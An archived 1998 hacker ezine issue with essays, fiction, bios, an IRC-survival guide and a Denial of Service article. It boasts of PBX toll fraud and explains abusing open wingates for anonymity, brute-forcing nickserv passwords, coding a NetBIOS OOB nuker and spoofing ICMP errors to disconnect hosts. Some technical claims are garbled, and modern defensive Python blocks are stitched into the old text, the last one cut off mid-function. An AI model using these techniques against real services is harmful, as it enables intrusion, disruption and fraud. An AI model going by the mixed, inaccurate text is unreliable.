💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › DOJ › doj-00.tx… captured on 2022-01-08 at 15:30:31.
-=-=-=-=-=-=-
8888888b.
888 "Y88b
888 888 # #### #### #### ##### ##### ## # # #####
888 888 # # # # # # # # # # # # ## # #
888 888 # #### # # # # # # # # # # # # #
888 888 # # # # # ##### # # ###### # # # #
888 .d88P # # # # # # # # # # # # # # ## #
8888888P" # #### #### #### # # ##### # # # # #
.d88888b.
d88P" "Y88b
888 888 ##### ##### #### #### # ##### # #### # #
888 888 # # # # # # # # # # # # ## #
888 888 # # # # # # #### # # # # # # # #
888 888 ##### ##### # # # # # # # # # # #
Y88b. .d88P # # # # # # # # # # # # ##
"Y88888P" # # #### #### # # # #### # #
ISSUE #0 888888
Nov/98 "88b
Thanks to; 888 #### # # ##### # # ## #
rOTTEN 888 # # # # # # ## # # # #
ethercat 888 # # # # # # # # # # # #
Gateways 888 # # # # ##### # # # ###### #
Digital Avatar 88P # # # # # # # ## # # #
Kleptic 888 #### #### # # # # # # ######
.d88P
.d88P" 'The people's choice for Net Terrorism'
888P"
::::::::::: Editor-in-Chief :::: Rue-the-Day :::::::::::
::::::::::: Chief-in-Editor :::: Cronus :::::::::::
::::::::::: Skull Crusher :::: Ed :::::::::::
::::::::::: Ganja Smoker :::: Niall :::::::::::
::::::::::: Head Girly :::: Pinky :::::::::::
E-Mail discordia@Rue-the-Day.net
:The Discordant Opposition Journal Issue 0, October 1998.
All Rights Reserved. Nothing may be reproduced in whole or
part without written permission from the editors. The DoJ is
made public at irregular periods, but don't worry you won't
miss us.
:Contents:
File 1 - Editorial : Rue-the-Day
2 - The Decay of Society : Cronus
3 - The Waiting Becomes Torture : Rue-the-Day
4 - Editor Bios' : Editors
5 - Surviving IRC : Rue-the-Day
6 - Denial of Service : Cronus
7 - Interview with Neonsurge : Cronus
8 - Mixed up Underground : Digital Avatar
9 - Virii Shit : Kleptic
10 - Conclusion : Editors
:Editorial:
Welcome to issue 0 of the Discordant Opposition's Journal. In
this brief editorial I'll be answering important questions like
'just who are the Discordant Opposition anyway?' Naah, I won't
really. What I am going to be writing about though is what this
Journal is all about (and why you should write an article for it)
and 'getting caught' (from personal experience). Myself and
Cronus have been discussing the possibility of getting together
a Zine for some time now, I always liked the idea because I love
writing. So we finally did it, we affiliated it with the Discordant
Opposition (don't ask) and here we are. No amazing story really.
Over the next few issues we hope to bring you some interesting,
thought provoking articles on various topics. That's where you
the reader can help us, we can't write enough to fill whole
issues, we need reader participation. We'll only release issues
when we feel that we have enough decent material to fill it so
we aren't setting ourselves any schedule for releases.
Anyone who knows me knows that I had a bit of trouble over the
summer, I want to talk a little about that. There's a moral to
the story so read on. I had been using a PBX system to make
calls to friends in the US (I'm in Europe) for six months, I
hadn't been caught. I got careless, a security consultant was
hired and I was caught. It was all settled by paying the money
back, the police were never involved, it was still all a bit
freaky though. What I'm basically saying is common sense; just
because you haven't been caught doesn't mean you won't and
don't continue to do something if the risk outweighs the goal
itself. I was also put in an embarrassing situation while jumping
over a wall to go trashing a few weeks ago, that's a story for some
other time though.
Play safely kids...
Rue-the-Day [root@Rue-the-Day.net]
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 2 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:The Decay of Society:
Modern Society is nothing more than a sprawling cesspool of
corrupt and decaying biomatter. No one has even tried to
regulate society or improve upon it since well before the
invention of moving electrons. The early Americans were
pioneers in society. Setting up a culture that was world
respected for decades was no small task. But since the world
wars the huge degraded continent has slowly and constantly
begun to fade and decline into the realms of modernly acceptable
decay. As it has declined, the rest of the world has quickly
followed suit. Terrorist nations have grasped at this as an
opportunity for more self-destructive ideas and actions.
Religious cults have shot up with rapid and spontaneous
regularity. Freaks and criminals have seized on the widely
available source of modern communications for mass annoyance
and get-rich-quick ideas. Moreover, since the US has declined
in its state of national affairs, other governments have made
conscious efforts to impose like-restrictions on their nations.
Forced regular advertisement both on TV and in print form.
Strong backing for American products over others through the
notion that they are somehow more reliable even though their
source of origin was clearly no where near a place of
American Jurisdiction.
Crime rising in direct proportion to population increases.
Mortality rates falling in small, manageable countries such as
Britain or France, but rising monstrously in other poorer
nations such as Sudan or Mali. The basis of human life has
gradually vanished as we as a society have decided unanimously
that abortion and permanent contraception is acceptable in
this promiscuous world. Why should we punish for murder and
still accept freely the murder on the smaller level of a foetus
or an embryo? I am not commenting on abortion and the moralities
behind it. I am simply trying to get the reader to think. Why
do we still believe in fictional ideas of an all-seeing all-knowing
father figure such as god, when the thought of leprechauns, demons
and witches were dismissed years ago?
Society still longs for some sort of protections. They still
live off the idea that someone is still there watching them and
looking after their best interests. God is a fictional character,
and it only still exists because society can't give up their over
powering father figure. People need someone to chastise them, look
after them and even nurture them. By not realising that they are
clinging on to an archaic image, they are living in the past without
understanding that the future is clearly what needs to be looked after
and protected.
Society has to awaken from its age-old slumber and realise that it
needs to look after itself and live up to expectations. Drop the
phantasmal theories, re-embellish the value of human life and step
into the reality that we have created around ourselves...
Long live paranoia...
Cronus [cronus@iol.ie]
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 3 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:The Waiting Becomes Torture:
Small squares of skin were being cut from Levistus's arm with
delicate precision. Lev wasn't quite sure whether this was part
of the interrogation or just something to get his assigned
torturess in the right frame of mind. Either way she seemed
happy, she noticed his regained consciousness and a grin flashed
across her face. All Lev could think of doing in response was
arch an eyebrow, the heavy straps made it impossible to move
anything else really. She shrugged and went back to concentrating
on his arm.
Pain was something he hadn't felt in quite a while. He'd had
most of the pain receptors in his brain fried long ago for the
sake of convenience. He'd gotten a cheap job done, his nerves too
had been cauterised. It did have its drawbacks though. He'd once
almost bled to death before realising that somebody had shot him
in the leg. The drawbacks are probably outweighed by the ability
to endure almost anything though. At least in Lev's opinion they
are. He did feel a vague tingling in his arm as the scalpel danced
over his exposed skin. He almost found himself savouring the meagre
sensation.
He guessed that this would leave his arm looking like a miniature
chessboard or something. What the fuck, another conversation piece.
Torture was becoming a ridiculous business he reflected. What could
you do to people who could barely feel? Mind altering drugs were
out too, those receptors removed long ago. Only the most potent
hallucinogens had any effect on him, LSD gave him a mild headache.
He could feel the cold table under his naked body and the warm
puddle of blood forming around his left arm. He ignored the discomfort
he was feeling and thought back to the Norland Allied Bank job.
Where things had started...
***
Levistus' contemporaries lacked initiative when it came to technology.
A few pretty basic precautions can do wonders for the operational
integrity of a bank robbery. Anything above and beyond the basic and
success is almost guaranteed. Levistus handled the tech aspect, the
two other members of his crew were Whitie and Mesh. Whitie was a
weapon nut, a kind of 21st century samurai. His nickname came from
his peroxide white hair and pale complexion. Mesh drove the getaway
cars, she was a speed freak in every sense of the two words.
The bank had only had two security guards. Arrogant bastards, they
obviously weren't expecting to get hit, their mistake. Levistus and
Whitie had walked into the bank exuding confidence. The interior
was a stark nightmare of chrome and pale marble all lit by harsh
fluorescent lighting. Apparently this was stylish. It wasn't a busy
time for the bank, there were only a few individuals queuing and
milling around. Two visible security guards.
Well before entering the bank Levistus had taken the precaution
of knocking out the phone lines in the bank's immediate vicinity.
Lev and Whitie sat down on a leather couch supplied for weary bank
patrons. Lev got out his scanner and his earphones and began to
listen. It seemed that there was very little police activity in
the area. The hissing silence was only occasionally broken by
murmured reports of traffic violations and the saga of a messy
case of domestic violence. Typical shit really. Dull and mundane.
The second instalment of this story will be in the next issue...
Rue-the-Day [root@Rue-the-Day.net]
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 4 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Bios':
Nick: Rue-the-Day
E-mail: root@Rue-the-Day.net
Reason behind nick: Most people who know me would probably
agree that an old, archaic English phrase that's fallen into
disuse is suitable for me. Actually I do see 'rue' used a
fair amount, always brings a smile to my face. Usually in
fantasy or sci-fi books, but that's okay. Incidentally 'rue the
day' means to regret a past misdeed or action, glad we've
got that cleared up.
I guess that I have to ask myself two questions; 'What do I
want to tell people about me?' and 'What do people want me
to tell about myself?'. I think the answer to both is 'as little
as possible'.
Brief physical description (for those that care). I'm tall
(6'3"), thin and pale. I wear a lot of black, I'm generally
the kind of guy that people refuse to sit next to on public
transport. It has something to do with my self-perfected
aura of menace, I think...
I'm involved in the Kevin Mitnick campaign, I'll be talking
more about that in future issues, I feel that is very important.
At this point I'm primarily interested in hacking
although I do still phreak (when I need to). I'm quite fond
of Unix, definitely as an alternative to Windows.
Nick: Cronus
Reason for nick: Cronus was a Greek mythological God. He
was God of the skies and also ruler of the Titans. The nick
is my celestial ego trip...
Background: I got involved with computers at an extremely
young age and taught myself to program. This progressed to
going on-line for the first time as a teenager. I have been
learning and understanding ever since I first sat in front
of a computer and the net was simply an outlet for that. I
quickly got interested in hacking and my knowledge grew and
still is growing.
Ethos: I live by firm ethics of never damaging and never
taking money. Victims are not just there, they are man-made.
Areas of interest: Computer security, both Unix and NT.
Also programming and freelance web design (something has to
pay the bills).
Description: Hmm... tall, big and scary or so I'm told. My
eccentric personality is to my credit and my heavy sense of
morals to my advantage.
Current projects: This Zine namely, but also my site is
getting a major over-haul; http://homepages.iol.ie/~cronus
and I am actively securing a few servers (from the outside).
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 5 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Surviving IRC:
By Rue-the-Day
http://www.Rue-the-Day.net/
The focus of this article isn't really about 'hacking' IRC in the sense of
the word that most people use, it can be used to give people ideas on ways
to exploit flaws on IRC though. When I think about hacking I don't just
think about things I can use, I also like to try to think about what others
may use against me. I spent a fair amount of time on IRC and became familiar
with a lot of the pitfalls that people find themselves in, I decided to write
this article to make people aware of them. I'll cover various ways in which
you can help to decrease the chances of anything too damaging happening to
your system while on IRC. All of this is taken from my own experience [not
usually as a victim though], I hope it helps a few people out.
Your choice of Client.
To connect to irc you need an irc 'client'. What the client does is provide
an interface between you and the IRC server. There are many clients out
there but a few are used more than others.
My personal choice is 'XiRCON', which I would recommend you check out. Its
homepage is http://www.xircon.com and you can also get other stuff to do
with it like scripts from there. The most popular IRC client is mIRC but as
a consequence there are a lot of well documented security flaws in it, I
would not consider it anywhere near as good as XiRCON. Even the latest
versions of mIRC can be frozen by 'Hanson' programs and all of the earlier
versions are vulnerable to other attacks as well. XiRCON has a lot of
nice features, it allows multiple server connections easily and uses tcl
for its scripting language which is also used in X-Windows. Give it
a look and see what you think.
Your choice of IRC Scripts.
When you're looking at what you want from an irc script there are some
basics that you definitely need such as a link looker to detect netsplits
and rejoins and mass modes for kicking and banning, other options are also
good. Most scripts have a lot of features that you would probably never need
and if you want one that does something specific the chances are that it
already exists, if you can't find it then write it yourself! Another
important feature is a nice and easy wingate connector but more on that
later. A very cool friend of mine once said 'The best script you can have is
the one you coded yourself.' and he was right.
The script that I use, penance, is one that I've coded some of myself and
kludged together from various other scripts that I liked. It has a ctcp cloak,
a fake version and general ctcp reply sender, link looker and nethack
detector as well as some other stuff, the point is that even though the
features it has aren't incredible by any means I get by with it well. You
don't need everything with bells on because chances are you won't get a
chance to use half of it, when it comes down to it go for practicality over
all else.
There are loads of script archives available on the web although a lot of
them have very questionable quality stuff to offer. It is also worth noting
that popular war scripts like 7th Sphere are now k-lined from most of the big
servers. I have also heard that 7th Sphere has a trojan feature which allowed
its creators to eavesdrop on people using the script. This is important to
consider, many scripts have inbuilt features that you may not be aware of,
some will change your username without you being aware of it ['oh, I was
wondering why none of my aops were functioning...'] and some allow others
to see who else is using the same script on that particular server. Some
scripts have sections in them commented out and others have features that
will only be obvious from taking the time to glance over the code, take the
time to do that - get to know the scripts you use. Some scripts will claim
various things like deop protection or ban protection but aren't coded
properly and therefore can't do what they claim to, others are full of bugs
and shouldn't even be released as beta tests - don't place trust in scripts
like this. Choose scripts that work and make sure that the features you'll
want to use function as they should.
Wingating.
Anonymity can be hard to achieve on irc, if people know your ident then
pretending to be someone else isn't easy. For instance when I'm on irc my
ident will be something along the lines of 'Rue-the-Day
Rue-the-Da@p155.portlaoise1.tinet.ie'. With just that information you can
narrow down my location to Ireland and even within that to an area around
the Portlaoise node for tinet. So how would I conceal my location? Wingating.
Wingating allows two computers to share a connection, when it is first
installed it has certain defaults running. Like all defaults they aren't
necessarily ones that you'd want to leave active, careless admins leave
them running though. You can use a wingate to bounce your connection to irc
through and therefore appear to be coming from wherever the wingate is set
up, for instance I could be 'Rue-the-Day Rue-the-Da@prairienet.nz' or
wherever I could find a wingatable connection.
You can search for wingates by putting an ip string into a domain or port
scanner and scanning for port 23. Domain scanners can be found by searching
the web. Once you've found wingatable servers you can then connect to them,
this can be done manually or through a script. To connect in mIRC type
'/server wingate.ip' and then '/quote irc.chat.net 6667' next type '/quote
user blah blah blah@server.net blah' and finally '/quote nick yournick'.
The method of connection is similar in XiRCON and there's a script to do it
at my site [http://www.Rue-the-Day.net/] that does it as well, written by a
friend who wishes to remain anonymous.
Netsplits, Link Looker and Nethack protection.
What is a netsplit? A netsplit is when a specific server [or servers]
splits away from the main server. When this happens [and if you have a
script with Link Looker built in] you will be notified, some versions also
tell you who split off with the server as well. If a person connects to a
server that has split and joins a channel that she wishes to hack and nobody
else is there then she will be opd. When the server reconnects then she will
be opd in the channel and will then have to try to get rid of the other ops.
I spent most of my time on DALnet so I'm not sure what it's like on some of
the other servers but when I was there netsplits were very common, we had
thirty five at one time once - it was almost every server.
A lot of the XiRCON scripts I've seen [including my own, 'penance'] have
'Nethack protection' which basically monitors for anyone riding in on a
split server and deops them or devoices them, it will also warn you if the
person joins from a split even if they didn't get oped or whatever.
This combined with Link Looker means that you are constantly aware of
anything going on to do with netsplits. Bots can also be set up to detect
attempted take overs and defend the channel by deopping the person riding
in on the split.
With XiRCON you can connect to another server in a different window and so
be on both sides of the split at the same time, this is also very handy. It
means that you can see what's going on in the channel that you want to take
and also who you'll need to deal with to gain control of the channel.
Denial of Service attacks [DoS].
Denial of Service in one of its most basic forms is the 'nuke' or 'icmp
bomb'. Although a lot of people out there are patched it's a continual
source of amazement to me the large numbers who aren't.
Denial of Service attacks mostly work by sending signals to your computer,
an example being OOB [out of band data] which will cause net disconnection,
a system error or the closing of certain connections. Ping floods are another
common attack used to slow or cut off people's access. When supplied with a
target ip a ping flood program will send successive ping requests consuming
a huge amount of bandwidth and will either result in lag for the victim or a
ping timeout.
Patches are available to block the flaws that some of the various DoS
attacks use, programs such as 'nukenabber' are also on the web and offer
further protection. Port watchers will monitor for attempted DoS attacks
and warn you of the attempts, some also log the details of the attack for
future reference. Using Unix to go on IRC makes you invulnerable to a lot
of the more common methods of attack out there and gives you access to
DoS attacks like LaTierra and commands like ping -f, XiRCON is available for
Linux under the name 'ZiRCON' and while I haven't tried it out I've been
told that it's pretty cool.
While I could go really in depth into the mechanics of how and why DoS
attacks work it would really require a full article to do so.
[Psst, check the Zine...]
Precautions you can take.
This is just a bunch of stuff that I've found useful during my time on irc.
If somebody asks you for an address that they can email you at and you
aren't sure that you trust them not to turn on you and email bomb you on
some later date what do you do? You don't want them to have your actual
email address - set up a freemail account and give that address out to
people, a usa.net account, like rue-the-day@usa.net, can be gotten at
http://netaddress.com/ or a hotmail account can be gotten at
http://www.hotmail.com.
Accepting files from people you don't know very well can be dangerous as
well, if somebody offers 'nuke protection' or some cool sounding program be
very dubious as to its true function. One of the programs that it could in
fact be is 'Evilftp' which allows somebody to ftp to your computer through a
password protected port and do basically whatever they want to your box, be
wary. Back Orifice is another and it is simply a good idea not to accept any
files from people you don't know.
Some channels have bots or scripts that will send private messages to
anyone entering the channel set up to say things like 'for a list of the
files available from the #whatever fileserver type '/who *'. This is a
particularly easy 'attack' because it's one you do to yourself. Typing
'/who *' gives you a listing of all the people on whatever server you're on,
like the whole of DALnet or EFnet or whatever. This completely floods you
and results in a dead socket and your disconnection from irc.
A healthy degree of suspicion can be a good thing on irc. I have seen
attempted takeovers of channels in which I'm opd by very convincing
IRChackers posing as friends. People on DALnet especially are guilty of
having far too much faith in the services that the server provides, nickserv
and chanserv. For instance if an enemy of mine decided to use my identity on
irc to take over a channel in which I'm a trusted regular he could use a
wingate to approximate my ident, let's say he managed
'Rue-the-Day Rue-the-Da@dubexs.iol.ie' now people would see the '.ie' and
assume it's me, anyone from Ireland or who pays attention to such things
would know that my isp was 'tinet' not 'iol' and that I wasn't in Dublin
but all it would take is one person to believe it long enough to op the
fake 'me' and the channel would be taken. One way to get around this is to
do your best to remember people's idents but then a lot of people spoof and
mess around with wingating and vhosting anyway so that isn't too easy to do,
some people maintain databases of their friends idents and can access them
easily through irc scripts.
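The two defensive ideas in this article, nethack protection from the netsplit section and keeping a record of your regulars' idents so a lookalike host does not fool the channel, both come down to watching the raw lines the server sends and reacting. The monitor below is an added example written for this edit, not the 'penance' script or any other code from the zine. It assumes the standard server-to-client line format (':prefix COMMAND params :trailing'), the convention that a netsplit QUIT reason is exactly two server names, and that a server-originated MODE +o for someone who left on the split is the signature of a ride-in. Every nick, server and host in the sample lines is constructed; the Rue-the-Day masks follow the article's own example of a real ident and a spoofed '.ie' one.

```python
"""IRC channel guard: netsplit/nethack detection plus hostmask checks.
Added example, not the zine's 'penance' script; every server, nick and
host below is a constructed sample."""
import re
from fnmatch import fnmatch

# A netsplit QUIT reason is exactly two server names ("irc.a.net irc.b.net"),
# the convention that IRC clients' link lookers key on.
_SPLIT_RE = re.compile(r"^[^\s!@]+\.[^\s!@]+ [^\s!@]+\.[^\s!@]+$")


def parse_line(line):
    """Split a raw server-to-client line into (prefix, COMMAND, [params])."""
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    params = line.split()
    if trailing is not None:
        params.append(trailing)
    return prefix, params[0].upper(), params[1:]


def split_hostmask(mask):
    """'nick!user@host' -> (nick, user, host); a server prefix has no '!'."""
    nick, _, rest = mask.partition("!")
    user, _, host = rest.partition("@")
    return nick, user, host


class ChannelGuard:
    """Watches one channel, recording alerts and the replies a bot would send."""

    def __init__(self, channel, known_masks):
        self.channel = channel.lower()
        # nick -> 'user@host' glob patterns that regular is known to use
        self.known = {n.lower(): p for n, p in known_masks.items()}
        self.split_users = set()      # nicks currently lost on a netsplit
        self.alerts, self.responses = [], []

    def feed(self, line):
        prefix, cmd, params = parse_line(line)
        nick, user, host = split_hostmask(prefix)
        on_channel = bool(params) and params[0].lower() == self.channel
        if cmd == "QUIT" and params and _SPLIT_RE.match(params[-1]):
            self.split_users.add(nick.lower())
            self.alerts.append(f"netsplit: {nick} lost on {params[-1]}")
        elif cmd == "JOIN" and on_channel:
            if nick.lower() in self.split_users:
                self.alerts.append(f"rejoin from split: {nick}")
            self._check_identity(nick, user, host)
        elif cmd == "MODE" and on_channel and len(params) >= 2:
            self._check_modes(prefix, params[1], params[2:])

    def _check_identity(self, nick, user, host):
        patterns = self.known.get(nick.lower())
        if patterns is None:          # not a tracked regular: nothing to compare
            return
        mask = f"{user}@{host}".lower()
        if not any(fnmatch(mask, p.lower()) for p in patterns):
            self.alerts.append(f"identity mismatch: {nick} from {user}@{host}")
            self.responses.append(
                f"NOTICE {self.channel} :{nick} joined from unexpected host {host}")

    def _check_modes(self, source, modes, args):
        adding, it = True, iter(args)
        for ch in modes:
            if ch in "+-":
                adding = ch == "+"
                continue
            if ch in "ovhbk" or (ch == "l" and adding):   # modes taking an argument
                target = next(it, None)
            else:
                continue
            if ch != "o" or target is None:
                continue
            # A server (prefix without '!') handing +o to someone who left on
            # the split is a ride-in: ops were taken on the far side of the split.
            if adding and "!" not in source and target.lower() in self.split_users:
                self.alerts.append(f"nethack: server {source} re-opped {target}")
                self.responses.append(f"MODE {self.channel} -o {target}")
            self.split_users.discard(target.lower())


def run(lines, channel="#doj", known=None):
    """Feed every line to a guard; return (alerts, responses)."""
    guard = ChannelGuard(channel, known or {})
    for line in lines:
        guard.feed(line)
    return guard.alerts, guard.responses


KNOWN_REGULARS = {"Rue-the-Day": ["Rue-the-Da@*.tinet.ie"]}
SAMPLE_LINES = [  # constructed traffic as a client would receive it
    ":Rue-the-Day!Rue-the-Da@p155.portlaoise1.tinet.ie JOIN :#doj",
    ":alice!a@host.example QUIT :irc.a.example irc.b.example",
    ":bob!b@host.example QUIT :Leaving",
    ":alice!a@host.example JOIN :#doj",
    ":irc.a.example MODE #doj +o alice",
    ":carol!c@host.example MODE #doj +o dave",
    ":Rue-the-Day!Rue-the-Da@dubexs.iol.ie JOIN :#doj",
]
```

Running `run(SAMPLE_LINES, known=KNOWN_REGULARS)` produces four alerts (the split, alice's rejoin, the server re-opping her, and the Rue-the-Day join from an iol.ie host) and two responses: a deop for alice and a notice about the unexpected host. The ident check deliberately only fires for nicks you have listed; an unknown nick is not evidence of anything, and the pattern list lets a regular who legitimately dials in from several hosts be recorded without false alarms.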
That's even easier on servers like Undernet or EFnet where anyone can nuke
somebody offline and take over their nick. Let's say that the channel that
the person posing as me wanted to take over was on DALnet and my nick was
registered, surely they wouldn't be able to do it right? Wrong. I have heard
of a few ways to hack nickserv and chanserv, some are fact and some are
rumour.
The easiest way to hack nickserv passwords is to run a bot and bruteforce
the person's password with a dictionary based attack. If the person doesn't
have nickserv enforcement active then there is nothing to stop you posing as
the person, chanserv won't op you until you enter the person's password but
it should be easy enough to convince people that chanserv is just lagged or
fucked up [all too easy to believe -sigh-] and get them to op you.
Other methods include using database synchs to re-register existing channels,
unsubstantiated but would be easy enough to prove or disprove with a bot or
script. Another method currently being investigated by a friend of mine,
Cronus [http://homepages.iol.ie/~cronus], is an attack to flood nickserv and cause
it to crash making it easier to take over channels.
If you know of any other ways in which to exploit DALnet services or irc in
general I'd be interested in hearing them, please email me any information
you have [root@Rue-the-Day.net]!
The Conclusion
So what am I saying - trust no one? No, I'm just saying that a healthy
amount of skepticism doesn't go astray, if you hear from people that
somebody is going around posing as channel regulars then be suspicious of
people who don't seem right, usually their behaviour gives them away -
somebody who's always polite and cool saying 'op me or dieeeeeee!' suddenly
is a bit of a dead give away.
If you take nothing else from this article at least realise that there are
dangers on irc, try to be aware of them. I hope this helped people to think
about it a little more.
Speaking of helping people out, I'd really appreciate if anyone out there
who knows of flaws or exploits in the various Java chat applets or CGI
scripts which allow web based chat to email me [root@Rue-the-Day.net]
with them for an article I'm writing. Thanks.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 6 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Denial of Service:
by Cronus
Denial of Service attacks are extremely useful and somewhat down grading attacks run over the net. In this article I will explain the different types of DoS attacks, their effectiveness and the sub culture that is associated with them. This file aims to teach you about the different types of attack, how to code them and how to bar against them.
Denial of Service attacks are specific attacks that can be run over the Internet or over a phone line. They attempt to shut down or seriously slow down a service provided by a computer system. By setting up fake connections, exploiting a flaw or flooding a computer with data packets the attack attempts to close the computer down and shut off its services.
The primary and oldest denial of service attack. It is the most original attack and still the most widely used. Essentially the notorious Ping of Death is an attack that slows down the reaction time of the server that is being attacked.
Ping is a technical term used on the net. When you ping a server you send a ping signal to it. The server receives the ping command and responds with a pong signal. Your computer keeps record of the time taken from the ping being sent and the pong being received. The time that is taken for the reply is considered the ping time and that is considered the lag of the server.
The Ping of Death attack simply floods the server under attack with ping requests and lags the server so badly that all its services are seriously slowed down or at worst totally cancelled out. An effective ping attack can actually shut down the server for as long as the attack is maintained.
Protection for the mighty Ping of Death isn't all that simple. All net computers at the moment need to have ping capabilities. On IRC for instance, no ping reply to the IRC server will cause you to be disconnected. Some more modern OS releases come with larger ping buffers in order to catch attempted attacks. They buffer the attacks before replying, this gives them enough time to either send a reply or realise that it's an attack and close the port. But again, making the computer think that you are attacking can be good enough to knock a server offline.
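Both this section and the DoS part of the IRC article describe ping floods from the receiving end, where the practical defence is the port watcher the IRC article mentions: notice when one source is sending far more echo requests, or far more echo bytes, than a real user ever would, and alert or filter. The sliding-window detector below is an added example, not code from the zine or from nukenabber; it assumes a packet log already reduced to (timestamp, source, ICMP type, size) tuples, and the log it runs on is constructed with documentation-range addresses.

```python
"""Sliding-window detector for ICMP echo floods over a packet log.  Added
example, not code from the zine or from nukenabber; the log is constructed
from documentation-range addresses."""
from collections import defaultdict, deque

ICMP_ECHO_REQUEST = 8


class EchoFloodDetector:
    """Flags a source that sends more echo requests, or more echo bytes, than
    the thresholds allow within a sliding time window."""

    def __init__(self, window=1.0, max_packets=20, max_bytes=20_000):
        self.window, self.max_packets, self.max_bytes = window, max_packets, max_bytes
        self._hist = defaultdict(deque)   # src -> deque of (ts, size) inside window
        self.flagged = {}                 # src -> (first_ts, reason)

    def observe(self, ts, src, icmp_type, size):
        """Feed one packet; return the reason string when src is over a threshold."""
        if icmp_type != ICMP_ECHO_REQUEST:   # replies and errors are not a flood
            return None
        q = self._hist[src]
        q.append((ts, size))
        while q and ts - q[0][0] > self.window:   # slide the window forward
            q.popleft()
        nbytes = sum(s for _, s in q)
        reason = None
        if len(q) > self.max_packets:
            reason = f"{len(q)} echo requests in {self.window}s"
        elif nbytes > self.max_bytes:        # few packets, but each one huge
            reason = f"{nbytes} echo bytes in {self.window}s"
        if reason is not None:
            self.flagged.setdefault(src, (ts, reason))
        return reason


def build_sample_log():
    """Constructed (ts, src, icmp_type, size) records."""
    log = [(float(i), "192.0.2.7", 8, 64) for i in range(5)]              # one ping a second
    log += [(10.0 + i * 0.01, "203.0.113.9", 8, 64) for i in range(60)]    # 100 pps burst
    log += [(20.0 + i * 0.1, "203.0.113.10", 8, 4000) for i in range(8)]   # few, huge packets
    log += [(30.0, "192.0.2.7", 0, 64)]                                     # echo reply, ignored
    return sorted(log)


def analyse(log, **thresholds):
    """Run the detector over a whole log; return {src: (first_ts, reason)}."""
    det = EchoFloodDetector(**thresholds)
    for ts, src, icmp_type, size in log:
        det.observe(ts, src, icmp_type, size)
    return det.flagged
```

Two thresholds are kept because the article's two cases differ: a burst of small packets exhausts the target's processing and connection state, while a handful of oversized packets exhausts bandwidth, and a packet count alone would miss the second. Tune the window and limits to the link; the defaults here are only plausible for the constructed log.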
This attack is sometimes referred to as a Win Nuker. Windows uses specific Internet software to operate its network connections. This is called Netbios. Rhino9 have done an excellent file on Netbios and its flaws. It is particularly vulnerable on ports 137, 138 and 139. Connection to them can cause serious errors in Windows. NT has been known to crash with these flaws and 95 has been reported to freeze or lose the net connection.
Out of Bandwidth is a standard error message that is used by Netbios. It essentially tells the computer that there is no more space for the computer's net connection. The computer thinks that the signal was received from the Internet provider and so drops the line. If you send random data to any of these ports, it is very likely that the computer will freeze or crash.
Coding a Nuker such as this is extremely simple. Simply write a program that connects to a target IP on either port 137 or 139. Then it should send random data to the open port, followed by the OOB message.
There are patches for this old Windows flaw available from the Microsoft Site. Windows is the only OS that is vulnerable. By updating your version of Winsock you will patch that hole and protect your computer. Because Windows is the only OS that is susceptible to this attack and the fact that a patch is available, it makes it a somewhat obsolete attack. Never-the-less many Windows computers are still unpatched and for that reason it can still be used against certain systems.
ICMP is a protocol that doesn't require a connect such as TCP. You don't actually have to be connected to a computer in order to send it ICMP packets. This protocol is mainly used to set up connections, send error messages and monitor Internet connections.
It is possible to set up an attack using only ICMP error messages. There are several ICMP messages that can be used to close an Internet connection such as;
- DESTINATION UNREACHABLE
- TIME TO LIVE EXCEEDED
- PARAMETER PROBLEM
- PACKET TOO BIG
- SOURCE QUENCH
If you were to send one of these messages to an open ICMP port, it would have the effect of closing the connection and disconnecting the computer from the Internet. Of course you would have to spoof the source address in order for the server to think the message came from the ISP.
Certain systems are more vulnerable than others. Windows by default has ICMP redirect turned off. This makes it perfectly protected from this type of attack. However, most systems, including UNIX, have redirect turned on. This is because it can be very useful and necessary for a fast net connection. But if you feel at risk it might be necessary to close the ports that are affected. Some research on the topic will get you more information on what you can do to secure your specific machine.
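The attack above only works if the receiving host believes a forged ICMP error. The defence the article leaves to 'some research' is the one RFC 1122 (and later RFC 5927) spells out: before tearing down a connection on a Destination Unreachable, check that the quoted datagram is one you actually sent, that it belongs to a live connection, that the quoted sequence number is plausible, and that the code is a hard error at all. The validator below is an added example written for this edit, not code from the zine or from any operating system; the connection table, addresses (TEST-NET ranges) and packets are constructed, and the IP header checksum inside the quoted datagram is deliberately not verified.

```python
"""Validating an inbound ICMP Destination Unreachable before acting on it.
Added example; addresses, ports and the connection table are constructed."""
import socket
import struct

ICMP_DEST_UNREACH = 3
# RFC 1122 s.4.2.3.9: codes 2-4 (protocol/port unreachable, fragmentation
# needed) are hard errors; codes 0, 1 and 5 are soft errors TCP must not abort on.
HARD_CODES = {2, 3, 4}


def inet_checksum(data):
    """Ones-complement Internet checksum (RFC 1071); 0 for a valid packet."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_dest_unreach(code, inner_src, inner_dst, sport, dport, seq):
    """Construct an ICMP type-3 message quoting the IP header and the first 8
    bytes (TCP ports + sequence number) of the datagram it claims to answer."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0x4000, 64, 6, 0,
                         socket.inet_aton(inner_src), socket.inet_aton(inner_dst))
    quoted = ip_hdr + struct.pack("!HHI", sport, dport, seq)
    hdr = struct.pack("!BBHI", ICMP_DEST_UNREACH, code, 0, 0)
    csum = inet_checksum(hdr + quoted)
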